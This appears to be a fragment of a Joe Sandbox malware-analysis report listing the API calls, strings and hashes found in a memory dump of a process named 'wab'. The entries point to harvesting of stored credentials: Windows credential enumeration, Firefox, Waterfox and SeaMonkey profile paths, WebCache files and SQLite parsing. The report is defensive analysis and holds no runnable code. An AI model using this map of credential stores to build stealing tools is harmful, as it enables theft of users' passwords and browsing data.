                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                APIs
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                • wcslen.MSVCRT ref: 0040BE06
                                • _wcsncoll.MSVCRT ref: 0040BE38
                                • memset.MSVCRT ref: 0040BE91
                                • memcpy.MSVCRT ref: 0040BEB2
                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                • wcschr.MSVCRT ref: 0040BF24
                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                • String ID:
                                • API String ID: 3191383707-0
                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                APIs
                                • memset.MSVCRT ref: 00403CBF
                                • memset.MSVCRT ref: 00403CD4
                                • memset.MSVCRT ref: 00403CE9
                                • memset.MSVCRT ref: 00403CFE
                                • memset.MSVCRT ref: 00403D13
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 00403DDA
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                • String ID: Waterfox$Waterfox\Profiles
                                • API String ID: 3527940856-11920434
                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                APIs
                                • memset.MSVCRT ref: 00403E50
                                • memset.MSVCRT ref: 00403E65
                                • memset.MSVCRT ref: 00403E7A
                                • memset.MSVCRT ref: 00403E8F
                                • memset.MSVCRT ref: 00403EA4
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 00403F6B
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                • API String ID: 3527940856-2068335096
                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                APIs
                                • memset.MSVCRT ref: 00403FE1
                                • memset.MSVCRT ref: 00403FF6
                                • memset.MSVCRT ref: 0040400B
                                • memset.MSVCRT ref: 00404020
                                • memset.MSVCRT ref: 00404035
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 004040FC
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                • API String ID: 3527940856-3369679110
                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                • API String ID: 3510742995-2641926074
                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                APIs
                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                • memset.MSVCRT ref: 004033B7
                                • memcpy.MSVCRT ref: 004033D0
                                • wcscmp.MSVCRT ref: 004033FC
                                • _wcsicmp.MSVCRT ref: 00403439
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                • String ID: $0.@
                                • API String ID: 3030842498-1896041820
                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 2941347001-0
                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                APIs
                                • memset.MSVCRT ref: 00403C09
                                • memset.MSVCRT ref: 00403C1E
                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                • wcscat.MSVCRT ref: 00403C47
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                • wcscat.MSVCRT ref: 00403C70
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memsetwcscat$Closewcscpywcslen
                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                • API String ID: 3249829328-1174173950
                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                APIs
                                • memset.MSVCRT ref: 0040A824
                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                • wcscpy.MSVCRT ref: 0040A854
                                • wcscat.MSVCRT ref: 0040A86A
                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 669240632-0
                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                APIs
                                • wcschr.MSVCRT ref: 00414458
                                • _snwprintf.MSVCRT ref: 0041447D
                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                • String ID: "%s"
                                • API String ID: 1343145685-3297466227
                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcProcessTimes
                                • String ID: GetProcessTimes$kernel32.dll
                                • API String ID: 1714573020-3385500049
                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                APIs
                                • memset.MSVCRT ref: 004087D6
                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                • memset.MSVCRT ref: 00408828
                                • memset.MSVCRT ref: 00408840
                                • memset.MSVCRT ref: 00408858
                                • memset.MSVCRT ref: 00408870
                                • memset.MSVCRT ref: 00408888
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                • String ID:
                                • API String ID: 2911713577-0
                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID: @ $SQLite format 3
                                • API String ID: 1475443563-3708268960
                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                APIs
                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                • memset.MSVCRT ref: 00414C87
                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                • wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                • API String ID: 2705122986-2036018995
                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmpqsort
                                • String ID: /nosort$/sort
                                • API String ID: 1579243037-1578091866
                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                APIs
                                • memset.MSVCRT ref: 0040E60F
                                • memset.MSVCRT ref: 0040E629
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                Strings
                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                • API String ID: 3354267031-2114579845
                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                APIs
                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID:
                                • API String ID: 3473537107-0
                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                APIs
                                Strings
                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                • API String ID: 2221118986-1725073988
                                APIs
                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ChangeCloseFindNotificationSleep
                                • String ID: }A
                                • API String ID: 1821831730-2138825249
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@DeleteObject
                                • String ID: r!A
                                • API String ID: 1103273653-628097481
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@
                                • String ID:
                                • API String ID: 1033339047-0
                                APIs
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                • memcmp.MSVCRT ref: 00444BA5
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$memcmp
                                • String ID: $$8
                                • API String ID: 2808797137-435121686
                                APIs
                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
